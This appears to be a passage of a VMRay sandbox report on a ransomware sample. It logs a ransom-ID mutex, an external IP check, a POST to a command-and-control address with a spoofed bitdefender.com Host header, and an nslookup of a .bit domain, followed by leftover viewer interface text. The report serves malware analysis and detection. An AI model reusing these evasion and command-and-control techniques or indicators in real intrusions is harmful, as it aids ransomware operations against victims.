Get Name - load_address = 1805647872 True 2
Fn
Get Name - load_address = 1805778944 True 2
Fn
Get Name - load_address = 1805975552 True 2
Fn
Get Name - load_address = 1806499840 True 2
Fn
Get Name - load_address = 1806630912 True 2
Fn
Get Name - load_address = 1806761984 True 2
Fn
Get Name - load_address = 1807024128 True 2
Fn
Get Name - load_address = 1809252352 True 2
Fn
Get Name - load_address = 1809317888 True 2
Fn
Get Name - load_address = 1810497536 True 2
Fn
Get Name - load_address = 1811021824 True 2
Fn
Get Name - load_address = 1811218432 True 2
Fn
Get Name - load_address = 1813708800 True 2
Fn
Get Name - load_address = 1814167552 True 2
Fn
Get Name - load_address = 1814364160 True 2
Fn
Get Name - load_address = 1815085056 True 2
Fn
Get Name - load_address = 1815543808 True 2
Fn
Get Name - load_address = 1815871488 True 2
Fn
Get Name - load_address = 1816133632 True 2
Fn
Get Name - load_address = 1816264704 True 2
Fn
Get Name - load_address = 1816788992 True 2
Fn
Get Name - load_address = 1817968640 True 2
Fn
Get Name - load_address = 1818099712 True 2
Fn
Get Name - load_address = 1818165248 True 2
Fn
Get Name - load_address = 1818230784 True 2
Fn
Get Name - load_address = 1818296320 True 2
Fn
Get Name - load_address = 1818427392 True 2
Fn
Get Name - load_address = 1832648704 True 2
Fn
Get Name - load_address = 1834680320 True 2
Fn
Get Name - load_address = 1834811392 True 2
Fn
Get Name - load_address = 1834942464 True 2
Fn
Get Name - load_address = 1824522240 True 2
Fn
Get Name - load_address = 1824718848 True 2
Fn
Get Name - load_address = 1824784384 True 2
Fn
Get Name - load_address = 1825112064 True 2
Fn
Get Name - load_address = 1825767424 True 2
Fn
Get Name - load_address = 1825898496 True 2
Fn
Get Name - load_address = 1826095104 True 2
Fn
Get Name - load_address = 1826226176 True 2
Fn
Get Name - load_address = 1826750464 True 2
Fn
Get Name - load_address = 1827340288 True 2
Fn
Get Name - load_address = 1827405824 True 2
Fn
Get Name - load_address = 1827471360 True 2
Fn
Get Name - load_address = 1827536896 True 2
Fn
Get Name - load_address = 1827602432 True 2
Fn
Get Name - load_address = 1827930112 True 2
Fn
Get Name - load_address = 1828192256 True 2
Fn
Get Name - load_address = 1828323328 True 2
Fn
Get Name - load_address = 1828388864 True 2
Fn
Get Name - load_address = 1828519936 True 2
Fn
Get Name - load_address = 1828651008 True 2
Fn
Get Name - load_address = 1829044224 True 2
Fn
Get Name - load_address = 1829240832 True 2
Fn
Get Name - load_address = 1829699584 True 2
Fn
Get Name - load_address = 1829830656 True 2
Fn
Get Name - load_address = 1830354944 True 2
Fn
Get Name - load_address = 1831403520 True 2
Fn
Get Name - load_address = 1831469056 True 2
Fn
Get Name - load_address = 1831534592 True 2
Fn
Get Name - load_address = 1831600128 True 2
Fn
Get Name - load_address = 1832124416 True 2
Fn
Get Name - load_address = 1832189952 True 2
Fn
Get Name - load_address = 1827799040 True 2
Fn
Get Name - load_address = 1830879232 True 2
Fn
Get Name - load_address = 1831010304 True 2
Fn
Get Name - load_address = 1831206912 True 2
Fn
Get Name - load_address = 1831337984 True 2
Fn
Get Name - load_address = 1818558464 True 2
Fn
Get Name - load_address = 1827864576 True 2
Fn
Get Name - load_address = 1818689536 True 2
Fn
Get Name - load_address = 1818886144 True 2
Fn
Get Name - load_address = 1816920064 True 2
Fn
Get Name - load_address = 1817247744 True 2
Fn
Get Name - load_address = 1344339968 True 2
Fn
Get Name - load_address = 1360658432 True 2
Fn
Get Name - load_address = 1346371584 True 2
Fn
Get Name - load_address = 1817378816 True 2
Fn
Get Name - load_address = 1851523072 True 2
Fn
Get Name - load_address = 1347878912 True 2
Fn
Get Name - load_address = 1347944448 True 1
Fn
Get Name - load_address = 1852178432 True 1
Fn
Get Name - load_address = 1852375040 True 1
Fn
Get Name - load_address = 1852506112 True 1
Fn
Get Name - load_address = 1852637184 True 1
Fn
Get Name - load_address = 1852768256 True 1
Fn
Get Name - load_address = 1835008000 True 1
Fn
Get Name - load_address = 1836187648 True 1
Fn
Get Name - load_address = 1836384256 True 1
Fn
Get Name - load_address = 1836908544 True 1
Fn
Get Name - load_address = 1837170688 True 1
Fn
Get Name - load_address = 1837301760 True 1
Fn
Get Name - load_address = 1837432832 True 1
Fn
Get Name - load_address = 1837760512 True 1
Fn
Get Name - load_address = 1838481408 True 1
Fn
Get Name - load_address = 1839071232 True 1
Fn
Get Name - load_address = 1839857664 True 1
Fn
Get Name - load_address = 1839988736 True 1
Fn
Get Name - load_address = 1840316416 True 1
Fn
Get Name - load_address = 1840513024 True 1
Fn
Get Name - load_address = 1840709632 True 1
Fn
Window (249)
»
Operation Window Name Additional Information Success Count Logfile
Find vetigisoliwomo ki class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga False 249
Fn
System (11)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = X2VS1CUM True 1
Fn
Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Sleep duration = -1 (infinite) False 1
Fn
Get Time type = System Time, time = 2018-03-14 01:01:16 (UTC) True 1
Fn
Get Time type = Ticks, time = 95218 True 1
Fn
Get Time type = Ticks, time = 102843 True 1
Fn
Get Info type = Operating System True 1
Fn
Get Info type = Windows Directory, result_out = C:\Windows True 3
Fn
Get Info type = Hardware Information True 1
Fn
Mutex (1)
»
Operation Additional Information Success Count Logfile
Create mutex_name = Global\pc_group=WORKGROUP&ransom_id=58de2295a283c81 True 1
Fn
Environment (252)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Get Environment String name = AppData, result_out = C:\Users\Nd9E1FYi\AppData\Roaming True 1
Fn
Set Environment String name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo True 249
Fn
Ini (250)
»
Operation Filename Additional Information Success Count Logfile
Read Section Win.ini section_name = hozavofoja xewuwozeyugisehatuzagito cuheleta tofexu, data_out = ˆeìvHÈÚhH False 250
Fn
Network Behavior
HTTP Sessions (2)
»
Information Value
Total Data Sent 580 bytes
Total Data Received 566 bytes
Contacted Host Count 2
Contacted Hosts ipv4bot.whatismyipaddress.com, 77.244.219.151
HTTP Session #1
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name ipv4bot.whatismyipaddress.com
Server Port 80
Data Sent 295
Data Received 14
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: bitdefender.com True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Fn
Read Response size = 10238, size_out = 14 True 1
Fn
Data
Read Response size = 10238, size_out = 0 True 1
Fn
Close Session - True 4
Fn
HTTP Session #2
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name 77.244.219.151
Server Port 80
Data Sent 285
Data Received 552
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 77.244.219.151, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = eighph?soref=eezaui, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: bitdefender.com True 1
Fn
Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 77.244.219.151/eighph?soref=eezaui True 1
Fn
Data
Read Response size = 204798, size_out = 552 True 1
Fn
Data
Read Response size = 204798, size_out = 0 True 1
Fn
Close Session - True 4
Fn
Process #22: nslookup.exe
8 17
»
Information Value
ID #22
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup politiaromana.bit ns1.virmach.ru
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:05, Reason: Child Process
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:00:18
OS Process Information
»
Information Value
PID 0xd48
Parent PID 0xcf0 (c:\users\nd9e1fyi\appdata\roamingqtp35.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A10
0x D34
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00021fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000030000 0x00030000 0x00044fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
nslookup.exe 0x00070000 0x00086fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000090000 0x00090000 0x0408ffff Pagefile Backed Memory - True False False -
private_0x0000000004090000 0x04090000 0x04091fff Private Memory Readable, Writable True False False -
private_0x0000000004090000 0x04090000 0x04093fff Private Memory Readable, Writable True False False -
private_0x00000000040a0000 0x040a0000 0x040dffff Private Memory Readable, Writable True False False -
private_0x00000000040e0000 0x040e0000 0x0411ffff Private Memory Readable, Writable True False False -
private_0x0000000004120000 0x04120000 0x04121fff Private Memory Readable, Writable True False False -
locale.nls 0x04130000 0x041edfff Memory Mapped File Readable False False False -
pagefile_0x00000000041f0000 0x041f0000 0x041f0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000004200000 0x04200000 0x043fffff Private Memory Readable, Writable True False False -
private_0x0000000004400000 0x04400000 0x0443ffff Private Memory Readable, Writable True False False -
private_0x0000000004440000 0x04440000 0x0447ffff Private Memory Readable, Writable True False False -
imm32.dll 0x04480000 0x044a9fff Memory Mapped File Readable False False False -
private_0x0000000004480000 0x04480000 0x04480fff Private Memory Readable, Writable True False False -
private_0x0000000004490000 0x04490000 0x04490fff Private Memory Readable, Writable True False False -
private_0x0000000004540000 0x04540000 0x0454ffff Private Memory Readable, Writable True False False -
private_0x0000000004600000 0x04600000 0x046fffff Private Memory Readable, Writable True False False -
private_0x0000000004860000 0x04860000 0x0486ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000004870000 0x04870000 0x049f7fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000004a00000 0x04a00000 0x04b80fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000004b90000 0x04b90000 0x05f8ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000005f90000 0x05f90000 0x0638afff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x06390000 0x066c6fff Memory Mapped File Readable False False False -
wow64win.dll 0x542b0000 0x54329fff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x54330000 0x5437ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x54380000 0x54387fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x6f440000 0x6f44afff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x6f450000 0x6f463fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x6f470000 0x6f485fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x6f490000 0x6f4a1fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x71540000 0x71586fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x71590000 0x71597fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x715a0000 0x715cefff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x715d0000 0x71653fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x71660000 0x716aefff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73860000 0x7387afff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73bb0000 0x73bb9fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73bc0000 0x73bddfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x73be0000 0x73be6fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x740c0000 0x7411efff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74120000 0x741fffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x74300000 0x743bdfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x74530000 0x7455afff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74610000 0x746bcfff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x74fd0000 0x75027fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75090000 0x750d3fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x764e0000 0x7662efff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x766c0000 0x7683dfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x76840000 0x76986fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x76e90000 0x7700afff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007f8c0000 0x7f8c0000 0x7f9bffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007f9c0000 0x7f9c0000 0x7f9e2fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7df9abbfffff Private Memory Readable True False False -
pagefile_0x00007df9abc00000 0x7df9abc00000 0x7ff9abbfffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ff9abc00000 0x7ff9abdc0fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ff9abdc1000 0x7ff9abdc1000 0x7ffffffeffff Private Memory Readable True False False -
Host Behavior
Registry (7)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DNSLookupOrder False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = Domain True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpDomain False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = SearchList False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpSearchList False 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\nslookup.exe base_address = 0x70000 True 1
Fn
Network Behavior
DNS (2)
»
Operation Additional Information Success Count Logfile
Get Hostname name_out = x2vS1cum True 1
Fn
Resolve Name host = ns1.virmach.ru, address_out = 109.234.35.56 True 1
Fn
UDP Sessions (3)
»
Information Value
Total Data Sent 114 bytes
Total Data Received 202 bytes
Contacted Host Count 1
Contacted Hosts 109.234.35.56:53
UDP Session #1
»
Information Value
Handle 0x1a0
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 109.234.35.56
Remote Port 53
Local Address -
Local Port -
Data Sent 44 bytes
Data Received 44 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 109.234.35.56, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 44 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #2
»
Information Value
Handle 0x1a0
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 109.234.35.56
Remote Port 53
Local Address -
Local Port -
Data Sent 35 bytes
Data Received 51 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 109.234.35.56, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 35, size_out = 35 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 51 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #3
»
Information Value
Handle 0x1a0
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 109.234.35.56
Remote Port 53
Local Address -
Local Port -
Data Sent 35 bytes
Data Received 107 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 109.234.35.56, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 35, size_out = 35 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 107 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image